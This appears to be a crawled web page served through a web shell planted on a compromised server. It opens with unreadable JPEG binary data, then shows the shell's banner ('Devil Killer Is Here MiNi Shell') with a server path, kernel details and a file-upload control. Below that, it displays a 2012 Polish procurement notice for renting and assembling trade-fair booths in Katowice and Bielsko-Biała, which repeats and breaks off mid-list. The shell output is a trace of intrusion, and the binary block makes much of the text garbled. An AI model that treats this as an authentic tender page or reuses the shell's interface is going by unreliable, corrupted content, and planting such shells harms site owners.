JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120820/179443-N-2012.html

<p class="kh_header"><b>Katowice: WYNAJEM, DOSTAWA, MONTAŻ I DEMONTAŻ ZABUDOWY STOISK TARGOWYCH</b><br>
<b>Numer ogłoszenia: 179443 - 2012; data zamieszczenia: 20.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYNAJEM, DOSTAWA, MONTAŻ I DEMONTAŻ ZABUDOWY STOISK TARGOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajem, dostawa, montaż i demontaż zabudowy stoisk targowych podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji, odbywających się w dniu 11.10.2012 r. w Katowicach i Bielsku - Białej. Niniejsze postępowanie prowadzone jest w dwóch częściach.

Część I:
Przedmiotem zamówienia w części I jest wynajem, dostawa, montaż i demontaż zabudowy 70 stoisk targowych podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Katowicach odbywających się w dniu 11.10.2012r. w Śląskim Urzędzie Wojewódzkim (ul. Jagiellońska 25). 

Szczegółowy opis:

1. Wynajem zabudowy 70 stoisk targowych o wymiarach 1,5 m (głębokość) x 2 m (szerokość) każde    zgodnie z poniższym opisem:
a) ścianki wewnętrzne i zewnętrzne w kolorze białym z płyty z atestem trudnopalności,  
b) lada recepcyjna o wymiarach 1m x 0,5m, h= min. 0,9m, max= 1m), wykonana z elementów systemu wystawienniczego z wmontowaną od wewnątrz półką w kolorze białym, 
c) fryz czołowy o wymiarach 200 cm x 30-40 cm, w kolorze białym z nazwą firmy (jednolity krój liter, czcionka w kolorze czarnym, rozmiar tekstu dostosowany równomiernie do wielkości fryzu),
d) instalacja elektryczna o mocy 230V z osprzętem: min. 1 punkt świetlny i min. 1 gniazdo elektryczne na każde 3m2,  	
e) punkt świetlny - halogen o mocy min. 150W,
f) gniazdo elektryczne o mocy 230V,
g) wyposażenie dodatkowe na każdym stoisku: 1 kosz na śmieci, dwa krzesła plastikowe, stolik plastikowy (wszystkie krzesła i stoliki w takim samym kolorze),
h) dodatkowo Wykonawca powinien w czasie wydarzenia dysponować 35 dodatkowymi krzesłami plastikowymi (w takim samym kolorze jak krzesła na stoiskach) które będą do dyspozycji wystawców.  
Wszystkie materiały zabudowy stoisk oraz wyposażenia dodatkowego muszą posiadać wymagane atesty i certyfikaty bezpieczeństwa. 
Wykonawca pozostanie właścicielem elementów zabudowy i materiałów wykorzystanych do wykonania zabudowy, które są tylko użyczane Zamawiającemu. 
Wykaz wystawców (nazwy firm) do przygotowania fryzów zostanie przekazany Wykonawcy w formie elektronicznej do dnia 03.10.2012r
Zamawiający zobowiązuje się do poinformowania wystawców biorących udział w targach o zakazie dokonywania trwałych zmian na stoiskach wystawowych, takich jak np. nawiercanie konstrukcji stoiska lub używanie taśmy dwustronnej do naklejania materiałów na stoisko a także zakazie podłączania do gniazd elektrycznych urządzeń o dużym poborze prądu (takich jak czajniki elektryczne itp.). 
2. Transport elementów zabudowy i materiałów do miejsca odbywania Targów i do magazynu/ siedziby Wykonawcy po zakończeniu prac.  
3. Montaż zabudowy w dniu 10.10.2012r. w Westybulu (parter, I i II piętro) - rozpoczęcie prac będzie możliwe od godz. 15:30 i zakończy się nie później niż w dniu 11.10.2012 r. do godz. 7.00. 
Demontaż w dniu 11.10.2012r. po zakończeniu Targów (rozpoczęcie prac będzie możliwe po godz. 16:00). 
W trakcie wykonywania montażu Wykonawca zobowiązany jest do:
a) systematycznego porządkowania miejsc wykonywania zabudowy, stoisk wystawienniczych, ścian osłonowych oraz terenu wystawowego, na którym postawione były stoiska i pozostawienie go w stanie niepogorszonym, niewykraczającym poza skutki zwykłego używania, 
b) wykonywania wszelkich działań związanych z przedmiotowym zamówieniem zgodnie z przepisami BHP oraz przepisami przeciwpożarowymi, 
c) zagospodarowania odpadów zgodnie z obowiązującymi w tym zakresie przepisami.   
4. Zapewnienie obsługi technicznej w dniu targów w godz. 8:00 - 16:00: 1 specjalista ds. elektryki i oświetlenia oraz 1 specjalista ds. stoisk i zabudowy. 

Część II:
Przedmiotem zamówienia w części II jest wynajem, dostawa, montaż i demontaż zabudowy 20 stoisk targowych podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Bielsku - Białej odbywających się w dniu 11.10.2012r. w Bielskim Centrum Kształcenia Ustawicznego i Praktycznego (ul. Piastowska 21). 
Szczegółowy opis:
1. Wynajem zabudowy 20 stoisk targowych o wymiarach 1,5 m (głębokość) x 2 m (szerokość) każde zgodnie z poniższym opisem:
a) ścianki wewnętrzne i zewnętrzne w kolorze białym z płyty z atestem trudnopalności,  
b) lada recepcyjna o wymiarach 1 m x 0,5m, h= min. 0,9m, max= 1m), wykonana z elementów systemu wystawienniczego z wmontowaną od wewnątrz półką w kolorze białym, 
c) fryz czołowy o wymiarach 200 cm x 30-40 cm, w kolorze białym z nazwą firmy (jednolity krój liter, czcionka w kolorze czarnym, rozmiar tekstu dostosowany równomiernie do wielkości fryzu),
d) instalacja elektryczna o mocy 230V z osprzętem: min. 1 punkt świetlny i min. 1 gniazdo elektryczne na każde 3m2,  	
e) punkt świetlny - halogen o mocy min. 150W,
f) gniazdo elektryczne o mocy 230V,
g) wyposażenie dodatkowe na każdym stoisku: 1 kosz na śmieci, dwa krzesła plastikowe, stolik plastikowy (wszystkie krzesła i stoliki w takim samym kolorze),
h) dodatkowo Wykonawca powinien w czasie wydarzenia dysponować 15 dodatkowymi krzesłami plastikowymi (w takim samym kolorze jak krzesła na stoiskach) które będą do dyspozycji wystawców.  
Wszystkie materiały zabudowy stoisk oraz wyposażenia dodatkowego muszą posiadać wymagane atesty i certyfikaty bezpieczeństwa. 
Wykonawca pozostanie właścicielem elementów zabudowy i materiałów wykorzystanych do wykonania zabudowy, które są tylko użyczane Zamawiającemu. 
Wykaz wystawców (nazwy firm) do przygotowania fryzów zostanie przekazany Wykonawcy w formie elektronicznej do dnia 03.10.2012r
Zamawiający zobowiązuje się do poinformowania wystawców biorących udział w targach o zakazie dokonywania trwałych zmian na stoiskach wystawowych, takich jak np. nawiercanie konstrukcji stoiska lub używanie taśmy dwustronnej do naklejania materiałów na stoisko a także zakazie podłączania do gniazd elektrycznych urządzeń o dużym poborze prądu (takich jak czajniki elektryczne itp.). 
2. Transport elementów zabudowy i materiałów do miejsca odbywania Targów i do magazynu/ siedziby Wykonawcy po zakończeniu prac.  
3. Montaż zabudowy w dniu 10.10.2012r. w Bielskim Centrum Kształcenia Praktycznego 
i Ustawicznego (aula i korytarz na parterze) - rozpoczęcie prac będzie możliwe od godz. 15:30 i zakończy się nie później niż w dniu 11.10.2012 r. do godz. 7.00. 
Demontaż w dniu 11.10.2012r. po zakończeniu Targów (rozpoczęcie prac będzie możliwe po godz. 16:00). 
W trakcie wykonywania montażu Wykonawca zobowiązany jest do:
a) systematycznego porządkowania miejsc wykonywania zabudowy, stoisk wystawienniczych, ścian osłonowych oraz terenu wystawowego, na którym postawione były stoiska i pozostawienie go w stanie niepogorszonym, niewykraczającym poza skutki zwykłego używania, 
b) wykonywania wszelkich działań związanych z przedmiotowym zamówieniem zgodnie z przepisami BHP oraz przepisami przeciwpożarowymi, 
c) zagospodarowania odpadów zgodnie z obowiązującymi w tym zakresie przepisami.   
4. Zapewnienie obsługi technicznej w dniu targów w godz. 8:00 - 16:00: 1 specjalista ds. elektryki i oświetlenia oraz 1 specjalista ds. stoisk i zabudowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.95.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 10.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE PRZEWIDUJE  WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I

Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi o wartości nie mniejszej niż 15 000,00 zł każda, której przedmiotem zamówienia był wynajem i lub wykonanie oraz montaż stoisk wystawienniczych. 

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu zawierającego usługę wykonaną w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą ww przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest świadczona, datą jej realizacji, wartości oraz załączeniem dokumentu lub dokumentów potwierdzających, że usługa wymieniona w wykazie została wykonana lub jest wykonywana należycie (np. referencje). 

Dokument lub dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

część II

Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi o wartości nie mniejszej niż 8 000,00 zł każda, której przedmiotem zamówienia był wynajem i lub wykonanie oraz montaż stoisk wystawienniczych. 

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu zawierającego usługę wykonaną w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą ww przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest świadczona, datą jej realizacji, wartości oraz załączeniem dokumentu lub dokumentów potwierdzających, że usługa wymieniona w wykazie została wykonana lub jest wykonywana należycie (np. referencje). 

Dokument lub dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Środki Komisji Europejskiej -Grant EURES.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYNAJEM, DOSTAWA, MONTAŻ I DEMONTAŻ ZABUDOWY STOISK TARGOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I:
Przedmiotem zamówienia w części I jest wynajem, dostawa, montaż i demontaż zabudowy 70 stoisk targowych podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Katowicach odbywających się w dniu 11.10.2012r. w Śląskim Urzędzie Wojewódzkim (ul. Jagiellońska 25). 

Szczegółowy opis:

1. Wynajem zabudowy 70 stoisk targowych o wymiarach 1,5 m (głębokość) x 2 m (szerokość) każde    zgodnie z poniższym opisem:
a) ścianki wewnętrzne i zewnętrzne w kolorze białym z płyty z atestem trudnopalności,  
b) lada recepcyjna o wymiarach 1m x 0,5m, h= min. 0,9m, max= 1m), wykonana z elementów systemu wystawienniczego z wmontowaną od wewnątrz półką w kolorze białym, 
c) fryz czołowy o wymiarach 200 cm x 30-40 cm, w kolorze białym z nazwą firmy (jednolity krój liter, czcionka w kolorze czarnym, rozmiar tekstu dostosowany równomiernie do wielkości fryzu),
d) instalacja elektryczna o mocy 230V z osprzętem: min. 1 punkt świetlny i min. 1 gniazdo elektryczne na każde 3m2,  	
e) punkt świetlny - halogen o mocy min. 150W,
f) gniazdo elektryczne o mocy 230V,
g) wyposażenie dodatkowe na każdym stoisku: 1 kosz na śmieci, dwa krzesła plastikowe, stolik plastikowy (wszystkie krzesła i stoliki w takim samym kolorze),
h) dodatkowo Wykonawca powinien w czasie wydarzenia dysponować 35 dodatkowymi krzesłami plastikowymi (w takim samym kolorze jak krzesła na stoiskach) które będą do dyspozycji wystawców.  
Wszystkie materiały zabudowy stoisk oraz wyposażenia dodatkowego muszą posiadać wymagane atesty i certyfikaty bezpieczeństwa. 
Wykonawca pozostanie właścicielem elementów zabudowy i materiałów wykorzystanych do wykonania zabudowy, które są tylko użyczane Zamawiającemu. 
Wykaz wystawców (nazwy firm) do przygotowania fryzów zostanie przekazany Wykonawcy w formie elektronicznej do dnia 03.10.2012r
Zamawiający zobowiązuje się do poinformowania wystawców biorących udział w targach o zakazie dokonywania trwałych zmian na stoiskach wystawowych, takich jak np. nawiercanie konstrukcji stoiska lub używanie taśmy dwustronnej do naklejania materiałów na stoisko a także zakazie podłączania do gniazd elektrycznych urządzeń o dużym poborze prądu (takich jak czajniki elektryczne itp.). 
2. Transport elementów zabudowy i materiałów do miejsca odbywania Targów i do magazynu/ siedziby Wykonawcy po zakończeniu prac.  
3. Montaż zabudowy w dniu 10.10.2012r. w Westybulu (parter, I i II piętro) - rozpoczęcie prac będzie możliwe od godz. 15:30 i zakończy się nie później niż w dniu 11.10.2012 r. do godz. 7.00. 
Demontaż w dniu 11.10.2012r. po zakończeniu Targów (rozpoczęcie prac będzie możliwe po godz. 16:00). 
W trakcie wykonywania montażu Wykonawca zobowiązany jest do:
a) systematycznego porządkowania miejsc wykonywania zabudowy, stoisk wystawienniczych, ścian osłonowych oraz terenu wystawowego, na którym postawione były stoiska i pozostawienie go w stanie niepogorszonym, niewykraczającym poza skutki zwykłego używania, 
b) wykonywania wszelkich działań związanych z przedmiotowym zamówieniem zgodnie z przepisami BHP oraz przepisami przeciwpożarowymi, 
c) zagospodarowania odpadów zgodnie z obowiązującymi w tym zakresie przepisami.   
4. Zapewnienie obsługi technicznej w dniu targów w godz. 8:00 - 16:00: 1 specjalista ds. elektryki i oświetlenia oraz 1 specjalista ds. stoisk i zabudowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.95.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYNAJEM, DOSTAWA, MONTAŻ I DEMONTAŻ ZABUDOWY STOISK TARGOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II:
Przedmiotem zamówienia w części II jest wynajem, dostawa, montaż i demontaż zabudowy 20 stoisk targowych podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Bielsku - Białej odbywających się w dniu 11.10.2012r. w Bielskim Centrum Kształcenia Ustawicznego i Praktycznego (ul. Piastowska 21). 
Szczegółowy opis:
1. Wynajem zabudowy 20 stoisk targowych o wymiarach 1,5 m (głębokość) x 2 m (szerokość) każde zgodnie z poniższym opisem:
a) ścianki wewnętrzne i zewnętrzne w kolorze białym z płyty z atestem trudnopalności,  
b) lada recepcyjna o wymiarach 1 m x 0,5m, h= min. 0,9m, max= 1m), wykonana z elementów systemu wystawienniczego z wmontowaną od wewnątrz półką w kolorze białym, 
c) fryz czołowy o wymiarach 200 cm x 30-40 cm, w kolorze białym z nazwą firmy (jednolity krój liter, czcionka w kolorze czarnym, rozmiar tekstu dostosowany równomiernie do wielkości fryzu),
d) instalacja elektryczna o mocy 230V z osprzętem: min. 1 punkt świetlny i min. 1 gniazdo elektryczne na każde 3m2,  	
